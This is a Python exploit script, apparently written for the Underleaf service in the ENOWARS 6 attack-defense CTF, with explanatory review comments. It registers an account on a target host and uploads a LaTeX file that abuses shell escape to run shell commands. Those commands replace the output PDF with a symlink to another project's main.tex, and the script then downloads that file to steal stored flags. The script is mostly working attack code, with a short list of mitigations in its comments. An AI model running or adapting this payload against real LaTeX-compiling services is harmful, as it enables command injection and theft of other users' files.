Underleaf (1st flag storage) - ENOWARS 6
#!/usr/bin/env python3
import hashlib
import json
import random
import string
import sys
import time

import requests
def get_random_str(length):
    """Return a string of ``length`` random ASCII letters.

    Drawn with the ``random`` module (not ``secrets``): the callers use it
    for a throw-away username and proof-of-work nonces, where
    unpredictability is not a requirement.

    Args:
        length: number of characters to produce; 0 yields "".
    """
    alphabet = string.ascii_letters
    chars = []
    for _ in range(length):
        chars.append(random.choice(alphabet))
    return ''.join(chars)
def hash_string(string):
    """Return the hex SHA-256 digest of ``string`` encoded as UTF-8.

    Note: the parameter name shadows the imported ``string`` module inside
    this function; it is kept for compatibility with existing callers.
    """
    data = string.encode('utf-8')
    digest = hashlib.sha256(data)
    return digest.hexdigest()
def get_nonce():
    """Mine a 32-letter nonce whose SHA-256 hex digest ends in "0000".

    Brute force: keep drawing fresh candidates from get_random_str() until
    the last four hex digits of hash_string() are zero (16 bits of work,
    so on average ~65k hashes per call). Used as the proofOfWork value the
    compile endpoint expects.
    """
    candidate = get_random_str(32)
    while hash_string(candidate)[-4:] != "0000":
        candidate = get_random_str(32)
    return candidate
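def get_paths(ip):
    """Return the project ids listed for ``ip`` in the ENOWARS attack-info feed.

    Fetches the public attack.json, looks up
    ``resp["services"]["underleaf"][ip]``, and for every entry parses the
    first element of its ``'0'`` list as JSON and collects its
    ``"project_id"``. The whole round is retried until it succeeds.

    Args:
        ip: team address used as the key under the "underleaf" service.

    Returns:
        list of project ids in feed order (empty if the team has no entries).
    """
    feed_url = "https://6.enowars.com/scoreboard/attack.json"
    while True:
        try:
            # timeout so a stalled connection cannot block the script forever
            r = requests.get(feed_url, timeout=10)
            resp = r.json()
            team_entries = resp["services"]["underleaf"][ip]
            paths = []
            for entry in team_entries:
                json_r = json.loads(team_entries[entry]['0'][0])
                paths.append(json_r["project_id"])
        except (requests.RequestException, ValueError, KeyError, TypeError, IndexError):
            # Only network/parse/shape errors are retried. The original bare
            # except also swallowed KeyboardInterrupt, which made a persistent
            # failure an un-interruptible hot loop against the scoreboard;
            # back off briefly between attempts instead.
            time.sleep(1)
            continue
        return paths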
# Set-up phase: register a throw-away account on the target (sys.argv[1])
# and create one project. Later steps reuse `session` (which now carries
# the bearer token) and `proj_id`. There is no error handling here: a
# registration or create reply that is not JSON with the expected key
# raises ValueError/KeyError and aborts the script.
session = requests.Session()
URL = f"http://{sys.argv[1]}:4242/api/auth/register"
payload = {"username": get_random_str(16), "password": "eazybobo"}
response = session.post(URL, json=payload)
print(response.text)
token = response.json()["token"]
session.headers.update({"Authorization": f"Bearer {token}"})

URL = f"http://{sys.argv[1]}:4242/api/project/create"
payload = {"name": "TeCameloBobo"}
response = session.post(URL, json=payload)
print(response.text)
proj_id = response.json()["id"]
# NOTE(review): the gist's indentation was lost in extraction; the nesting
# below (proof-of-work retry loop and the output fetch both inside the
# per-flag loop) is reconstructed — confirm against the original gist.
for flag_name in get_paths(sys.argv[1]):
    # The upload is a hand-assembled multipart body with a fixed boundary
    # rather than requests' files= argument. The Content-Type header is set
    # on the session here and deleted again right after the upload so the
    # later JSON requests are not affected.
    session.headers.update({"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryx8Ft20tnLvpNVqqQ"})
    URL = "http://" + sys.argv[1] + ":4242/api/files/upload/" + proj_id + "/main.tex"
    # The uploaded main.tex is a single piped \input{|"..."}. If the service
    # compiles with shell escape enabled, the TeX engine runs the quoted
    # command line: it removes this project's output PDF and replaces it
    # with a symlink to another project's main.tex (the project tree looks
    # sharded by the first two characters of the id — inferred from the
    # path, not confirmed), so the output endpoint below serves that file.
    # The two base64 strings decode to \begin{verbatim} and \end{verbatim}.
    # Service-side mitigations: compile with shell escape disabled
    # (-no-shell-escape / restricted mode), sandbox the compiler so it
    # cannot reach other projects' directories, and have the output endpoint
    # serve only regular files it produced itself (no symlink following).
    code = "\\documentclass[12pt]{minimal}\n \\usepackage{verbatim}\n \\begin{document}\n \\input{|\"echo XGJlZ2lue3ZlcmJhdGltfQ== | base64 -d; rm /output/" + proj_id + ".pdf; ln -s ../../projects/" + flag_name[:2] + "/" + flag_name + "/main.tex /output/" + proj_id + ".pdf; exit 1; echo XGVuZHt2ZXJiYXRpbX0= | base64 -d\"} \n \\end{document}"
    payload = "------WebKitFormBoundaryx8Ft20tnLvpNVqqQ\r\nContent-Disposition: form-data; name=\"file\"; filename=\"file\"\r\nContent-Type: text/plain\r\n\r\n" + \
        code + "\r\n------WebKitFormBoundaryx8Ft20tnLvpNVqqQ--\r\n"
    response = session.request("POST", URL, data=payload)
    print(response.text)
    del session.headers["Content-Type"]
    # pow_accepted is never set to True; the loop only exits via the break
    # once the service reports status "ok". Every attempt mines a fresh nonce
    # in get_nonce(), and a reply that is not JSON with a "status" key raises
    # ValueError/KeyError.
    pow_accepted = False
    while not pow_accepted:
        URL = "http://" + sys.argv[1] + ":4242/api/latex/compile/" + proj_id
        payload = {'file': '/main.tex', 'proofOfWork': get_nonce()}
        response = session.request("POST", URL, json=payload)
        print(response.text)
        if response.json()["status"] == "ok":
            break
    # Fetch the compiled "PDF" for this project; after the command above it
    # is the other project's main.tex, presumably containing the stored flag.
    # flush=True is presumably for a harness reading stdout — confirm.
    URL = "http://" + sys.argv[1] + ":4242/api/latex/output/" + proj_id
    response = session.request("GET", URL)
    print(response.text, flush=True)